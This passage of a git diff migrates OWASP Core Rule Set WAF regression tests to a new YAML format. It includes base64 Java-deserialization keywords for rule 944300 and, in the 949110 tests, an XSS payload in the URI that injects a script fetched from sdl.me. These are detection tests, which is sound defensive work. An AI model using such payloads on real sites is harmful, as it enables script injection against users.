"Cookie test includes keyword HdoaWxlY2xvc3VyZQ" 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HdoaWxlY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-312 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HdoaWxlY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 312 desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HdoaWxlY2xvc3VyZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-313 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: 
HdoaWxlY2xvc3VyZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 313 desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HdoaWxlY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-314 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HdoaWxlY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 314 desc: "XML attribute value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-315 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 315 desc: "XML element value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-316 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 316 desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-317 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 317 desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-318 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 318 desc: "Content-Type application/json arg value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" - output: - 
log_contains: "id \"944300\"" - - test_title: 944300-319 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 319 desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-320 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 320 desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" 
- Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-321 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 321 desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-322 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU=test" + output: + log: + expect_ids: [944300] + - test_id: 322 desc: "Cookie test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=B3aGlsZWNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-323 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=B3aGlsZWNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 323 desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: B3aGlsZWNsb3N1cmU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-324 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: B3aGlsZWNsb3N1cmU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 324 desc: "Request 
header test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: B3aGlsZWNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-325 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: B3aGlsZWNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 325 desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-326 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + 
version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 326 desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-327 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 327 desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-328 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 328 desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-329 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 329 desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-330 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" + output: + log: + expect_ids: [944300] + - test_id: 330 desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" - output: - log_contains: "id \"944300\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" + output: + log: + expect_ids: [944300] diff --git a/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml b/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml index 33c049b..90685d5 100644 --- a/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml +++ b/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml 
@@ -1,92 +1,91 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "949110.yaml" description: | Test whether the inbound blocking mechanism works by testing whether rule 949110 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking rule to be triggered. +rule_id: 949110 tests: - - test_title: 949110-1 + - test_id: 1 desc: Test is basically identical to 941100-1 (XSS positive test in phase 2) but here we assert that the inbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "949110" - - test_title: 949110-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [949110] + - test_id: 2 desc: Test is basically identical to 941100-4 (XSS negative test in phase 2) but here we assert that inbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: 
GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Referer: http://www.coreruleset.org - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "949110" - - test_title: 949110-3 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Referer: http://www.coreruleset.org + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [949110] + - test_id: 3 desc: Test is basically identical to 920100-9 (protocol enforcement negative test in phase 1) but here we assert that the inbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "OPTIONS" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/options" - version: "HTTP/1.1" - output: - no_log_contains: "id \"949110\"" - - test_title: 949110-4 + - input: + dest_addr: "127.0.0.1" + method: "OPTIONS" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/options" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [949110] + - test_id: 4 desc: Test is basically identical to 920100-10 (protocol enforcement positive test in phase 1) but here we assert that inbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "REALLYLONGUNREALMETHOD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"949110\"" - - test_title: 949110-5 + - input: + dest_addr: "127.0.0.1" + method: "REALLYLONGUNREALMETHOD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [949110] + - test_id: 5 desc: Test is basically identical to 949110-0 (see above) but here we assert that the scores are summed up and reported properly stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "Inbound Anomaly Score Exceeded [(]Total Score: " + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + match_regex: 'Inbound Anomaly Score Exceeded \(Total Score: ' diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml index b6df65d..cf9e40a 100644 
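Review bot: Test 5's `desc` still points at "949110-0 (see above)", which exists under neither the old `test_title` numbering nor the new `test_id` numbering; the request it duplicates is test_id 1, so the line should read `desc: Test is basically identical to 949110-1 (see above) but here we assert that the scores are summed up and reported properly`. The same test's assertion, `match_regex: 'Inbound Anomaly Score Exceeded \(Total Score: '`, only proves the message prefix was logged, not that the anomaly score was actually summed, so the description promises more than the check delivers. If the expected total for this request is known, anchoring it in the regex (e.g. `Total Score: <EXPECTED_SCORE>\)`, placeholder to be filled from a run) would make the test verify what it claims.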
--- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951110.yaml" - description: "Regression tests for rule 951110" +rule_id: 951110 tests: - - test_title: 951110-1 + - test_id: 1 desc: "Matching Microsoft Access SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body":"[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression"} - output: - log_contains: "id \"951110\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 